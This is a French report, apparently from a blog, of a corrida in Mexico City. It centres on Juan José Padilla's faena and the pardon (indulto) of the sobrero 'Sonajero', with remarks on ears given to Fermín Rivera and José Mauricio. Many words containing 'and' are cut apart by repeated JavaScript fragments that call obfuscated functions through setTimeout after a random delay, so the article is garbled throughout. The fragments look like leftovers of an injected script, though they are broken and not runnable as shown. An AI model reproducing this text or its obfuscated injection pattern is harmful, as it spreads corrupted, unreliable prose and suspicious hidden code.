ARENES DE MEXICO : L’INDULTO D’UN SOBRERO

La corrida avait été ennuyeuse, avec un toro haut et dangereux, le premier, et cinq autres avec peu de trapio et pas une charge complète. Il est vrai que les deux matadors mexicains avaient coupé une oreille. Celle de Fermín Rivera fut plus acceptable parce que son temple, son bon placement et sa ténacité firent charger un taurillon sans race, arrêté et indolent.

Mais c’était trop : un tour de piste avec une forte ovation aurait été plus en accord avec ce que représentent ces arènes. Celle octroyée au torero local, José Mauricio, fut peu demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andée, le président l’attribua et le matador dut la rendre. Sans commentaires. Et comme Padilla avait été bouillant, électrique et manquait d’assurance, ça devenait insupportable.

Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and sortit le sobrero –« Sonajero » était son nom me parait-il- allègre, noble, avec de belles armures et peu de trapio, la corrida se déroulait sous les mêmes auspices : de vertigineuses largas inversées de Padilla et des dandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andinements et des courses autour du toro aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles, à l’exécution correcte et rapide. Mais, mes amis, les gens étaient du côté du torero de Jérez et le torero de Jérez avec les gens, de sorte que les arènes bouillirent d’abord avec des statuaires qui ne disaient pas grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-chose et explosèrent quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Juan José se mit au diapason de la charge longue, humiliée, rythmique du toro de Villa del Carmen dans de longues, contorsionnées et templées passes circulaires magnifiquement enchaînées à de grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes et très bonnes passes de poitrine.

Plusieurs séries de la sorte, une autre de naturelles à pieds joints et une dernière de molinetes, c’est en cela que consista la faena. Et on demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda la grâce. Et on la concéda. Et le torero de Jérez toucha les étoiles à México. Et le toro ? Eh bien il assura au cheval, fut allègre et noble aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles et à la muleta il eut la fixité du toro brave et un rythme exceptionnel. Oui, ce fut un bon indulto. Pourquoi pas ?

Les commentaires sont fermés.